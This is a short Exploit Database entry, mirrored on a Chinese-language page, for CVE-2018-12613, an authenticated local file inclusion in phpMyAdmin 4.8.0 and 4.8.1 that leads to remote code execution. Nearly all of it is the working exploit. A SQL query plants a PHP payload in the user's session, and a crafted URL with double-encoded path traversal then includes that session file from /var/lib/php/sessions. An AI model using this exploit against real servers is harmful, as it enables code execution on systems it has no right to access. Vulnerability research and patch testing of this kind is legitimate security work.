phpMyAdmin 4.8.1 – (Authenticated) Local File Inclusion (2)

• Exploit Database
• 25 阅读

• 作者： VulnSpy
  日期： 2018-06-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44928/

• # Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
  # Date: 2018-06-21
  # Exploit Author: VulnSpy
  # Vendor Homepage: http://www.phpmyadmin.net
  # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
  # Version: 4.8.0, 4.8.1
  # Tested on: php7 mysql5
  # CVE : CVE-2018-12613
  
  1. Run SQL Query : select '<?php phpinfo();exit;?>'
  2. Include the session file :
  http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k